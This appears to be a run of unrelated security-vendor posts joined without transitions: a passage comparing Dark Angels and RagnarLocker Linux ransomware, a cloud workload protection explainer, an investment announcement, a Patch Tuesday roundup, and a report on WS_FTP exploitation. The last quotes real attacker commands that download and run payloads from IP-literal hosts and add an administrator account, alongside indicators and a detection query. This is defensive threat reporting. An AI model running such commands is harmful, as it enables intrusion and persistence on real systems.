Dark Angels uses AES with a 256-bit key to encrypt files. The encryption routine can override a locked file by obtaining the PID of the locking process, then running the kill -9 command against that PID to terminate the process. This code will only execute if the PID value is greater than 10, which prevents the binary from attempting to kill files locked by crucial, kernel-interfacing processes.

Pseudocode showing Dark Angels’ logic for handling locked files
Pseudocode showing Dark Angels’ logic for handling locked files

Dark Angels vs. RagnarLocker

We identified considerable similarities between the Linux version of Dark Angels and a RagnarLocker binary circa 2021, 5411d7905bef69cb16d44f52fc46aa32fd922c80. From the file metadata perspective, both binaries are roughly 150 KB in size and designed for Intel x86-64 architectures. They also share the same compiler string compilation artifact: GCC: (GNU) 4.8.5 20150623 (Red Hat 4.8.5-44).

Dark Angels and RagnarLocker use the same encryption mechanism (AES-256) and the same file extension, .crypted. This is notable because the Windows version of RagnarLocker uses a bespoke file extension, RGNR_. The Dark Angels Windows version uses the .crypt extension.

Both ransomware families share the same file path exclusion list, which ensures critical system files are not encrypted. Dark Angels’ extension exclusion list also includes the ransom note name, .README_TO_RESTORE, which is not present in RagnarLocker.

Dark Angels data segment references to excluded file extensions & paths
Dark Angels data segment references to excluded file extensions & paths

RagnarLocker also writes the same log file, wrkman.log. The RagnarLocker binary only takes the threading argument with the same -m flag, as outlined in its usage message.

Usage:%s [-m (10-20-25-33-50) ] Start Path

Other optional arguments seen in Dark Angels are not present in RagnarLocker.

The overlap between the two families is further solidified with analysis of a sample of Dark Angels ransomware observed in September 2022. Sample 7c2e9232127385989ba4d7847de2968595024e83 is highly similar to the 2023 Dark Angels sample 06187023d399f3f57ca16a3a8fb9bb1bdb721603 described above.

At the surface level, we see the same wrkman.log file being used and the same -m parameter supported, but that is the only argument available, other than supplying a starting path.

Internal references, DA Linux 2022
Internal references, DA Linux 2022

The .crypted extension is also used along with the previously observed README_TO_RESTORE filename.

However, the 2022 sample directs victims to a different .ONION address, qspjx67hi3heumrubqotn26cwimb6vjegiwgvrnpa6zefae2nqs6xqad[.]onion.

DA Linux 2022 Ransom Note Excerpt .ONION address
DA Linux 2022 Ransom Note Excerpt .ONION address

When this payload was first reported that address was inactive and remains so at the time of writing. In contrast, the 2023 variant directs victims to lyoevnzm3ewiq6jeyyuob2wfou7gh47yotuucsrwlf6ju3xrw43wacad[.]onion for live-chat/support and uses p66slxmtum2ox4jpayco6ai3qfehd5urgrs4oximjzklxcol264driqd[.]onion as the victim leak site. p66slxmtum2ox4jpayco6ai3qfehd5urgrs4oximjzklxcol264driqd is the historic Dark Angels Team-hosted “Dunghill Leak” site.

Dark Angels Team Logo as seen on Dunghill Leak
Dark Angels Team Logo as seen on Dunghill Leak

Also of note, the 2023 variant changed the hosting method for proof-packs (proof or evidence of leakage), using the victim(s) password-protected ufile[.]io links.

DA Linux 2023 Proof-pack
Dark Angels Linux 2023 Proof-pack

The 2022 variation uses simple, unsecured image links to image sharing service ibb[.]co.

DA Linux 2022 proof-pack
Dark Angels Linux 2022 proof-pack

Recommendations

Endpoints running the SentinelOne agent are protected against the Dark Angels and RagnarLocker Linux variants. Organizations can prepare for attacks from groups like Dark Angels by implementing a robust vulnerability & patch management program, as previous reports indicate the group leverages vulnerabilities to achieve initial access before pivoting deeper into the environment.

Given the lack of security software on ESXi hypervisors, consider enhanced network monitoring for unusual access to these systems, including internal system traffic. When possible, focus on large or abnormal data transfers off of the ESXi server as well as other file storage services within the network.

Conclusion

ESXi lockers continue to prove successful for the ransomware groups who use them, yet the overall pool of unique Linux ransomware families remains narrow. We assess with high confidence that these two samples are related and that the Linux version of Dark Angels is a very lightly modified, more recent version of the analyzed RagnarLocker binary.

There is a potential caveat to attributing Dark Angels as the next iteration of RagnarLocker when vendors miscategorize information or fail to thoroughly explain connections made through their analysis. For example, the RagnarLocker binary was classified as RagnarLocker by Fortinet, but listed as a Vice Society file by another vendor, Quorum Cyber.

Based on the volume of VirusTotal community comments for the RagnarLocker binary, our assessment aligns with contributions from earlier researchers.

Indicators of Compromise

06187023d399f3f57ca16a3a8fb9bb1bdb721603 Dark Angels ELF binary (2023)
5411d7905bef69cb16d44f52fc46aa32fd922c80 RagnarLocker ELF binary (2021)
7c2e9232127385989ba4d7847de2968595024e83 Dark Angels ELF (2022)

Understanding Cloud Workload Protection (CWP) In Under 10 Minutes

In tandem with evolving business landscapes, cloud computing has emerged as a transformative force. The cloud’s ability to store, process, and deliver mass amounts of data and applications has made it the backbone of many modern businesses. Thanks to the cloud, many organizations have revolutionized the way they interact with information.

Clouds offer scalability, flexibility, and cost-efficiency, but organizations also grapple with its inherent risks and vulnerabilities. Since clouds are particularly susceptible to the threat of ransomware, data breaches, supply chain attacks, and misconfigurations, security leaders deploy cloud workload protection (CWP) strategies to secure both their data and users.

This blog post takes a closer look at what puts modern cloud environments at risk, how CWP addresses these security challenges, and the key things organizations need to know about Cloud Workload Protection Platforms (CWPPs) to maintain the integrity of their data and applications.

Securing the Whole and the Sum of All Parts | Cloud Workload Protection Defined

As more enterprises and organizations migrate over to cloud environments, protecting cloud workloads is top of mind for security leaders and IT teams.

What is a Cloud Workload?

Think of cloud workloads as the building blocks of cloud computing. They represent all of the relevant containers, functions, and machines that store the data and network resources needed to make a cloud-based application or service work properly.

Cloud workloads make up a wide range of activities such as running applications, processing data, hosting websites, and performing various computing tasks, all of which are executed within a cloud infrastructure. They can be accessed and managed remotely over the internet, making it possible for users to harness cloud resources from anywhere with an internet connection.

Cloud workloads are typically run in containers such as Docker and managed via container orchestration platforms like Kubernetes.

What distinguishes cloud workloads from traditional on-premises computing is their scalability and dynamic nature. Cloud workloads can be easily scaled up or down to meet changing demands, making them the optimal choice for organizations with fluctuating workloads. This scalability is a key advantage, allowing users to pay only for the resources they consume, rather than investing in fixed, dedicated hardware.

What is Cloud Workload Protection (CWP)?

Cloud Workload Protection, often referred to as CWP, is a holistic approach to security within cloud environments. It focuses on protecting the individual components that make up a cloud workload. This is done by ensuring the confidentiality, integrity, and availability of data and applications hosted in the cloud. Since cloud environments are highly dynamic, with workloads being spun up and down on-demand, it is too difficult to monitor and secure them using traditional security approaches.

CWP addressed these challenges by creating security solutions specifically designed for cloud workloads. In essence, these solutions integrated novel technologies, including artificial intelligence (AI) and machine learning (ML), for threat detection, real-time monitoring, and rapid response to security incidents. CWP providers began to develop solutions that cater to the dynamic nature of cloud workloads, providing adaptive security that could evolve with the environment.

The Role of a CWPP in Modern Cybersecurity

Today, CWPPs play a pivotal role in securing cloud environments by offering a range of key features and functionalities:

  • Real-Time Monitoring – CWP works by continuously monitoring cloud workloads for unusual activities, unauthorized access, and suspicious behavior. A proactive approach enables IT teams to identify potential security threats faster.
  • Threat Detection and Response – CWP leverages advanced analytics and machine learning to detect anomalies and potential security threats. When a threat is identified, it triggers automated responses or notifies the IT team for further investigation and mitigation.
  • Access Control – CWP enforces strict access controls, ensuring that only authorized users and processes can interact with cloud workloads. This includes identity and access management (IAM) controls and robust authentication mechanisms.
  • Vulnerability Management – CWP identifies and manages vulnerabilities within cloud workloads, including those associated with software, configurations, and dependencies. This approach helps organizations patch and secure their systems before potential attackers can exploit a vulnerability.

Deploying a trusted CWPP is essential for organizations operating in the cloud, as it effectively counters modern cyber threats. As cloud technologies and risks continue to develop and expand, CWPPs will remain a critical component for organizations looking to secure their digital assets and operations in the cloud era.

Understanding the Risks Found in a Cloud-First Landscape

Recent security reports have found that cloud assets remain one of the biggest targets for cyberattacks as data breaches continue to increase across all industries globally. Consider the scope of cloud-based risks by the numbers:

  • 39% of businesses dealt with data breach incidents in their cloud in 2022, up from 35% in 2021
  • 75% of organizations confirmed that more than 40% of their business-critical data is now stored in their cloud, up from the 26% reported last year
  • Though the amount of sensitive data being stored in the cloud as increased, only an average of 45% of this data is encrypted

Businesses operating in cloud environments face many cyber threats, each posing unique challenges to data security and operational integrity. Learn how Cloud Workload Protection (CWP) is instrumental in countering these threats, offering a multi-layered approach to fortifying cloud workloads and data.

Cloud Ransomware

Cloud ransomware operators focus on encrypting critical data stored in cloud environments and then demand a ransom for decryption. Ransomware operators like IceFire have expanded their focus from Windows devices to targeting Linux environments. Operators work to exploit vulnerabilities or weak access controls to gain access, encrypt data, and disrupt operations.

A CWPP counters this threat by continuously monitoring for suspicious activities, including unusual file encryption patterns. When ransomware is detected, a CWPP can respond swiftly, isolating affected workloads, limiting damage, and enabling recovery from clean backups.

Supply Chain Attacks

Supply chain attacks target third-party vendors and suppliers connected to a company’s cloud ecosystem. Cybercriminals exploit vulnerabilities in these supply chain partners to gain access to the target organization’s systems.

A Cloud Workload Protection Platform plays a vital role against such attacks by scanning and assessing the security of third-party cloud services, identifying potential vulnerabilities that could be exploited. This supports organizations in mitigating their risks and helping to bolster their security posture.

Cloud Vulnerabilities

Cloud vulnerabilities are security weaknesses in cloud platforms, services, or applications. Attackers can exploit these weaknesses to gain unauthorized access and compromise systems.

CWPP is designed to identify and address vulnerabilities in cloud environments. It conducts automated vulnerability assessments, scans for unpatched software or configurations, and offers remediation options. By applying patches and fixes, CWPP helps organizations protect their cloud workloads from exploitation.

Data Breaches

Data breaches are one of the most concerning cloud threats, involving unauthorized access to sensitive information.

A CWPP prevents data breaches by enforcing strong IAM processes, access controls, and encryption. Continuous monitoring for unauthorized access, unusual data movement, and data exfiltration helps identify potential data breach attempts early, allowing for rapid response and mitigation.

Insider Threats

Insider threats can come from employees or individuals with privileged access to cloud resources. They may intentionally or unintentionally compromise data or systems.

As the risk of insider threats grows, Cloud workload protection supports IT teams by monitoring user activities. It identifies suspicious behavior or access patterns that may indicate insider threats. Organizations can then take immediate action, such as revoking privileges or initiating investigations.

Cloud Misconfigurations

Misconfigured cloud services can expose sensitive data to the public internet, making it an attractive target for cybercriminals.

CWP helps in preventing cloud misconfigurations by offering automated security configuration checks. It identifies misconfigured services and resources, alerting organizations to rectify issues promptly. This proactive approach reduces the risk of data exposure due to misconfigurations.

DDoS Attacks

Distributed-Denial-of-Service (DDoS) attacks overwhelm cloud services with malicious traffic, causing disruptions.

A CWPP can mitigate the impact of DDoS attacks by monitoring network traffic patterns and diverting malicious traffic away from cloud workloads. This ensures that the cloud services remain accessible to legitimate users and maintains service availability.

Cryptominers

Cryptomining malware can be deployed on Docker containers by cyber criminals to mine currencies such as Monero while the resource costs are absorbed by unwitting victims. Cryptocurrency mining malware hinders system performance, increases the compute power cost to businesses, and in some cases can be a precursor of further infections.

A Cloud Workload Protection Platform protects cloud workloads running in Kubernetes from runtime threats and active exploitation associated with cryptominers like XMRig and other malware.

Singularity Cloud | SentinelOne’s Approach to Securing Cloud Workloads

SentinelOne enables organizations to safeguard their endpoints across all their cloud environments, whether public, private, or hybrid. These days, most organizations have thousands of accounts spread over multiple clouds, making cloud infrastructure and workload security a real priority item. SentinelOne’s Cloud Workload Protection Platform, Singularity Cloud, works by extending distributed, autonomous endpoint protection, detection, and response to compute workloads running in both public and private clouds, as well as on-prem data centers.

In today’s threat landscape, Cloud Workload Protection Platforms act as the final line of defense in a multi-layer cloud security strategy. Enterprise businesses and global organizations rely on CWPPs like Singularity Cloud for autonomous, real-time detection as well as remediation of complex threats at the virtual machine (VM) level and Kubernetes pod level with no need for human detection. Even against advanced malware, ransomware, and more, Singularity Cloud’s runtime protection of containerized workloads is able to identify and kill such unauthorized processes.

Conclusion

The power of the cloud provides countless organizations with scalability, flexibility, and cost-efficiency, but have also carved out avenues in which threat actors can launch their attacks. As businesses rely more heavily on cloud infrastructure, the risks of data breaches, ransomware attacks, supply chain vulnerabilities, and misconfigurations have all escalated in recent years.

To safeguard their digital assets and sensitive information, businesses have turned to cloud workload protection (CWP) strategies. Through a combination of real-time monitoring, threat detection, access control, and vulnerability management, CWP ensures that the dynamic nature of cloud workloads doesn’t become a vulnerability. With the right cloud workload protection solution in place, CWP allows businesses to harness the full potential of cloud computing without compromising their security.

SentinelOne can help organizations improve their cloud security strategy through a combination of real-time detection and response capabilities, autonomous threat hunting, and runtime solutions that can defeat cloud-based threats. Learn more about Singularity Cloud by booking a demo or contacting us today.

EBook: A Cloud Workload Protection Platform Buyer’s Guide
The Cloud Workload Protection Platform Buyer’s Guide is designed to walk you through key considerations when buying cloud workload solutions. We hope it helps to bring clarity to your evaluation and selection process.

S Ventures Invests in TileDB to Bring Simplicity and Performance to Complex Data Platforms

It’s not everyday that an idea emerges from academia with the potential to disrupt existing approaches and technologies. That’s why S Ventures is excited about our recent investment in TileDB, a universal data platform that unifies all types of data (and associated code) along with the complex infrastructure surrounding that data into a single solution. TileDB adapts its internal structure to optimize advanced applications across virtually any data schema.

When most people think of a database, they picture a set of data organized in columns and rows that create a logical relationship, like an Excel spreadsheet that lists sales by product. The data is typically stored as text or numerical data types and users would access and filter the data with a structured query language (or SQL). With the proliferation of the internet, social media, IoT devices, and other digital platforms, the amount of unstructured data being generated is enormous. It’s estimated that unstructured data accounts for more than 80% of the data generated globally.

Unstructured data comes in many formats – from text and images to videos and sensor data. This diversity makes it challenging to process and analyze using traditional database systems. Add in the complexity of new data formats, specialized point tools for visualization, machine learning, and DevOps in a fragmented cloud-native environment (where compute and storage are separated) and it’s no wonder every enterprise has a data problem – rigid access, limited mobility, and lack of holistic governance – and spend inordinate amounts of money and effort building large data engineering teams.

The team at TileDB has an audacious vision to reclaim simplicity and performance in the face of modern challenges, starting with the most challenging use cases in geospatial, life science, and machine learning with some of the world’s most complex enterprises.

“TileDB’s technology simplifies the development and operation of complex data platforms, by effectively replacing ensembles of task-specific databases. We are especially excited to see what this will do for emerging AI systems that rely on rapid access to multi-modal knowledge.” – Gregor Stewart, VP, AI & Machine Learning Engineering, SentinelOne

TileDB accomplishes this with a powerful, universal data structure, called the multi-dimensional array. Arrays can shape-shift to efficiently store and process any kind of data, from tables, to images, genomics, weather, graphs, key-values, point clouds, flat files and more. TileDB allows users to build, maintain and run any sophisticated ETL process, pipeline, workload or query algorithm, inside its serverless distributed computing environment. Keeping data, code and compute in a single place eliminates silos, reduces total cost of ownership and increases productivity and collaboration across teams and individuals.

“As leaders in cybersecurity and its application to machine learning, SentinelOne brings a unique perspective to TileDB. With the investment from S Ventures, we’ll continue to expand the application of our game-changing, array-based technology” – Stavros Papadopoulos, Founder and CEO, TileDB

Please join us in congratulating TileDB on their Series B and learn more about what they are building at tiledb.com.

Patch Tuesday, October 2023 Edition

Microsoft today issued security updates for more than 100 newly-discovered vulnerabilities in its Windows operating system and related software, including four flaws that are already being exploited. In addition, Apple recently released emergency updates to quash a pair of zero-day bugs in iOS.

Apple last week shipped emergency updates in iOS 17.0.3 and iPadOS 17.0.3 in response to active attacks. The patch fixes CVE-2023-42724, which attackers have been using in targeted attacks to elevate their access on a local device.

Apple said it also patched CVE-2023-5217, which is not listed as a zero-day bug. However, as Bleeping Computer pointed out, this flaw is caused by a weakness in the open-source “libvpx” video codec library, which was previously patched as a zero-day flaw by Google in the Chrome browser and by Microsoft in Edge, Teams, and Skype products. For anyone keeping count, this is the 17th zero-day flaw that Apple has patched so far this year.

Fortunately, the zero-days affecting Microsoft customers this month are somewhat less severe than usual, with the exception of CVE-2023-44487. This weakness is not specific to Windows but instead exists within the HTTP/2 protocol used by the World Wide Web: Attackers have figured out how to use a feature of HTTP/2 to massively increase the size of distributed denial-of-service (DDoS) attacks, and these monster attacks reportedly have been going on for several weeks now.

Amazon, Cloudflare and Google all released advisories today about how they’re addressing CVE-2023-44487 in their cloud environments. Google’s Damian Menscher wrote on Twitter/X that the exploit — dubbed a “rapid reset attack” — works by sending a request and then immediately cancelling it (a feature of HTTP/2). “This lets attackers skip waiting for responses, resulting in a more efficient attack,” Menscher explained.

Natalie Silva, lead security engineer at Immersive Labs, said this flaw’s impact to enterprise customers could be significant, and lead to prolonged downtime.

“It is crucial for organizations to apply the latest patches and updates from their web server vendors to mitigate this vulnerability and protect against such attacks,” Silva said. In this month’s Patch Tuesday release by Microsoft, they have released both an update to this vulnerability, as well as a temporary workaround should you not be able to patch immediately.”

Microsoft also patched zero-day bugs in Skype for Business (CVE-2023-41763) and Wordpad (CVE-2023-36563). The latter vulnerability could expose NTLM hashes, which are used for authentication in Windows environments.

“It may or may not be a coincidence that Microsoft announced last month that WordPad is no longer being updated, and will be removed in a future version of Windows, although no specific timeline has yet been given,” said Adam Barnett, lead software engineer at Rapid7. “Unsurprisingly, Microsoft recommends Word as a replacement for WordPad.”

Other notable bugs addressed by Microsoft include CVE-2023-35349, a remote code execution weakness in the Message Queuing (MSMQ) service, a technology that allows applications across multiple servers or hosts to communicate with each other. This vulnerability has earned a CVSS severity score of 9.8 (10 is the worst possible). Happily, the MSMQ service is not enabled by default in Windows, although Immersive Labs notes that Microsoft Exchange Server can enable this service during installation.

Speaking of Exchange, Microsoft also patched CVE-2023-36778,  a vulnerability in all current versions of Exchange Server that could allow attackers to run code of their choosing. Rapid7’s Barnett said successful exploitation requires that the attacker be on the same network as the Exchange Server host, and use valid credentials for an Exchange user in a PowerShell session.

For a more detailed breakdown on the updates released today, see the SANS Internet Storm Center roundup. If today’s updates cause any stability or usability issues in Windows, AskWoody.com will likely have the lowdown on that.

Please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains

Starting on September 30, 2023, SentinelOne has observed actors exploiting the recently disclosed flaws in Progress’ WS_FTP against Windows servers running a vulnerable version of the software. The two highest severity vulnerabilities–CVE-2023-40044 and CVE-2023-42657–were assigned a CVSS score of 10 and 9.9, respectively. We observed at least three types of multi-stage attack chains, which begin with exploitation, and then commands to download a payload from a remote server, often via an IP-literal URL.

This active, in-the-wild exploitation marks the third wave of attacks against a Progress Software product in 2023. While exploitation is likely opportunistic, organizations in the Information Technology Managed Service Provider (IT MSP), Software and Technology, Legal Services, Engineering and Construction, Oil and Natural Gas (ONG), Healthcare, and Nonprofit sectors have been impacted.

Technical Details

The exploitation activity may show in command logs, such as activity that references the app pool WSFTPSVR_WTM in the parent process for subsequent exploitation activity, for example:

C:WindowsSysWOW64inetsrvw3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l 
"webengine4.dll" -a .pipeiisipme{GUID_String} -h 
"C:inetpubtempapppoolsWSFTPSVR_WTMWSFTPSVR_WTM.config" -w "" -m 1 
-t 20 -ta 0

There have been several attack chains that follow exploitation of the WS_FTP vulnerability.

Attack Chain 1: Encoded PowerShell & Certutil Deliver Metasploit

The exploit invokes a command that:

  • Checks if the system architecture is 32- or 64-bit: the script uses this information to run PowerShell from the correct path
  • Uses obfuscated strings that disable PowerShell logging for the script’s execution
  • Decodes, extracts, and executes a Base64-encoded, Gzip-compressed string, and launches the decoded values as a new process
Encoded command containing Attack Chain 1
Encoded command containing Attack Chain 1

The obfuscated code above contains C# code with several functions:

  • l4 Function: Uses .NET reflection to fetch the GetProcAddress and GetModuleHandle methods from the Windows API.
  • pR Function: Sets parameters for the dynamic assembly to run.
  • $dYKA Variable: Decodes the base64-encoded PowerShell code containing a call to certutil to download a payload from an IP-literal URL.
  • $pq5zc Variable: Allocates memory for the shellcode using VirtualAlloc.
  • Copies the shellcode into allocated memory.
  • Creates and executes a new thread for the shellcode to run with all the established parameters.
The C# code responsible for running the certutil.exe call that downloads a payload from a remote server
The C# code responsible for running the certutil.exe call that downloads a payload from a remote server

The new process is certutil.exe with the -urlcache flag to download a payload from an IP literal URL. An example of this command:

/c certutil -urlcache -f hxxp://103[.]163[.]187[.]12:8080/{22-length-alphanumeric-string} 
%TEMP%{10-length-alpha-string}.exe & start /B 
%TEMP%{same-10-length-alpha-string}.exe
Decoded certutil.exe command that downloads the payload, and launches as a new process
Decoded certutil.exe command that downloads the payload, and launches as a new process

The payload (SHA-1: 83140ae9951b66fba6da07e04bfbba4e9228cbb8) downloaded from the server is categorized as Metasploit stager by detection rules on VirusTotal. In this case, the activity crashed, resulting in the system launching the Windows Error Reporting binary, WerFault.exe. Because we saw additional exploitation attempts several minutes later, we believe this attempt was unsuccessful, leading the actor to try again.

Attack Chain 2: Curl & Live Compilation via cl.exe

Another attack chain uses curl to download a payload that is executed with cl.exe, dynamically compiling the payload at runtime. The attack chain looks like this:

/c cmd.exe /c powershell -command "curl hxxp://34[.]77[.]65[.]112:25565"
/c cmd.exe /C curl 45[.]93[.]138[.]44/cl.exe -o C:/cl.exe
/c curl hxxps://tmpfiles[.]org/dl/2669853/client.txt -o $env:TEMP/cl.exe ;start-process $env:TEMP/cl.exe'
/c curl hxxps://tmpfiles[.]org/dl/2669123/client.txt -o $env:TEMP/cl.exe ;start-process $env:TEMP/cl.exe'
/c cmd.exe /C curl bgvozb1wnz86q952zxjlwusv2m8gw5[.]oastify[.]com
/c curl hxxps://tmpfiles[.]org/dl/2671793/sl.txt -o $env:TEMP/sl.exe ;start-process $env:TEMP/sl.exe'
/c cmd.exe /C curl qzt3iqkb6erl9oohic20f9bal1rsfh[.]oastify[.]com
/c cmd.exe /C C:/cl.exe

At the time of analysis, the tmpfiles[.]org files were no longer available, so we are unable to validate the final payload. The domain is associated with Burp Suite’s Collaborator product, which is used for security testing against Application Programming Interfaces (API).

While this tool can be used for legitimate security testing purposes, we are unable to confirm that this activity was attributable to an offensive security team. However, AssetNote integrated a lookup to oastify[.]com into their vulnerability analysis, which contains a step-by-step walkthrough for exploiting the vulnerability using a Ysoserial .NET deserialization gadget. Defenders can identify these calls through the use of curl or nslookup to a subdomain of oastify[.]com.

Attack Chain 3: Executables & AD Activity

This attack chain employed many different Windows executables housed in the server’s ProgramData path. While there is a call to PowerShell, this attack chain does not use any scripts. Instead, each of the commands outlined below are invoked by a series of executables with short names consisting of a letter and often one number, such as n1.exe, n2.exe, s.exe, and so on. We were unable to obtain these binaries for analysis.

-i -c "cmd.exe /c c:programdataxmpp.exe"
-i -c "cmd /c net user temp p@ssw0rd123 /add && net localgroup administrators temp /add"
-i -c "cmd /c net user temp p@ssw0rd123 /add"
-i -c "cmd /c whoami"
-i -c c:programdataxmpp.exe ls c:programdata
C:programdataft.exe
/c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2[.]oastify[.]com

The binary xmpp.exe is signed by SimpleHelp, a company that makes remote management software. The xmpp.exe binary executes each time before a subsequent command is run. It is likely the actor is using xmpp.exe as a form of remote access tool.

The actor attempted to add an Active Directory (AD) user named temp with the password p@ssw0rd123 to the Administrators group, which would provide privilege escalation if successful. This was followed by several attempts to add the same user without adding to the Administrators group, and lastly a call to whoami, which displays the active user for the console session. Based on this order of events, it is likely the attempt to add an Administrative user failed. Because this activity stops after the whoami command, it is likely the regular user creation succeeded.

Conclusion

Organizations using Progress’ WS_FTP product should update immediately or take impacted systems offline. These attacks are likely opportunistic, with actors scanning the internet for vulnerable systems.

When comparing this campaign to the MOVEit mass exploitation attack by the Clop ransomware group in June, there is a silver lining: the Censys research team found far fewer instances of WS_FTP online in comparison with today’s numbers of vulnerable MOVEit Transfer instances.

The researchers who identified these vulnerabilities noted that they looked at more file transfer products because of the previous findings in MOVEit Transfer. Based on this, we can assume that more vulnerabilities will be identified and weaponized as researchers focus on this product suite, with extra attention given to Progress based on the current and previous success it has yielded for vulnerability researchers.

Indicators of Compromise

Network Indicators – URLs
hxxp://34[.]77[.]65[.]112:25565
hxxp://34[.]77[.]65[.]112:25565
hxxp://103[.]163[.]187[.]12:8080/3P37p073LKuQjOE64pjEVw
hxxp://103[.]163[.]187[.]12:8080/c8e3vG0e3TMiqcjcZOXhhA
hxxp://103[.]163[.]187[.]12:8080/cz3eKnhcaD0Fik7Eexo66A
hxxp://103[.]163[.]187[.]12:8080/cz3eKnhcaD0Fik7Eexo66A
hxxp://103[.]163[.]187[.]12:8080/cz3eKnhcaD0Fik7Eexo66A
hxxp://103[.]163[.]187[.]12:8080/Sw8J6d3NVuvrBiTCXrg4Og
hxxp://103[.]163[.]187[.]12:8080/xkJ5de2brMfvCNNnBoRRAg
hxxp://141[.]255[.]167[.]250:8081/o1X7qlIaYzSmCj[.]hta
hxxp://176[.]105[.]255[.]46:8080/aqmCG0mZlo_xnZRAWbz6MQ
hxxp://176[.]105[.]255[.]46:8080/OFmLqOxFRIkoENjCZsC7OQ
hxxp://176[.]105[.]255[.]46:8080/Rn0KQbPo22laaUbKGy30sg
hxxp://81[.]19[.]135[.]226:8080/_1TZ–18Hpqm06wvtjLMAg
hxxps://filebin[.]net/soa40iww2w8jhgnd/svchostt[.]dll
hxxps://tmpfiles[.]org/dl/2669123/client[.]txt
hxxps://tmpfiles[.]org/dl/2669853/client[.]txt
hxxps://tmpfiles[.]org/dl/2671793/sl[.]txt
45[.]93[.]138[.]44/cl[.]exe

Network Indicators – Domains
2adc9m0bc70noboyvgt357r5gwmnady2[.]oastify[.]com
bgvozb1wnz86q952zxjlwusv2m8gw5[.]oastify[.]com
qzt3iqkb6erl9oohic20f9bal1rsfh[.]oastify[.]com

Network Indicators – IPs
34[.]77[.]65[.]112
45[.]93[.]138[.]44
81[.]19[.]135[.]226
103[.]163[.]187[.]12
141[.]255[.]167[.]250
176[.]105[.]255[.]46

File Hashes – SHA-1
1d41e0783c523954ad12d950c3805762a1218ba6
1d7b08bf5ca551272066f40d8d55a7c197b2f590
32548a7ef421e8e838fa31fc13723d44315f1232
3fe67f2c719696b7d02a3c648803971d4d1fd18c
40b2d3a6a701423412bb93b7c259180eb1221d68
65426816ef29c736b79e1969994adf2e74b10ad8
790dcfb91eb727b04d348e2ed492090d16c6dd3e
83140ae9951b66fba6da07e04bfbba4e9228cbb8
83e6ede4c5f1c5e4d5cd12242b3283e9c48eea7e
8c14a4e7cee861b2fad726fc8dd0e0ae27164890
8dbca2f55c2728b1a84f93141e0b2a5b87fa7d35
923fd8fb3ddc1358cc2791ba1931bb4b29580bb6
98321d034ddc77fe196c6b145f126b0477b32db9
b4a5bf6c9f113165409c35726aec67ff66490787
b70aa1d07138b5cae8dd95feba9189f1238ee158
d00169f5eff9e0f2b5b1d473c0ee4fe9a3d8980e
d669b3977ebebf7611dd2cb1d09c31b3f506e9bd
e5ac227f143ec3f815e475c0b4f4f852565e1e76
f045a41def1752e7f8ef38d4ce1f7bd5e01490fc

SentinelOne Hunting Query

endpoint.os = 'windows' AND event.category = 'process' AND src.process.name in:anycase ('w3wp.exe') 
AND src.process.cmdline contains 'WSFTPSVR_WTM' AND tgt.process.cmdline contains 
('certutil', 'mshta', 'powershell', 'pwsh', 'cmd', 'curl', 'wmic', 'nslookup', 'ping', 'whoami')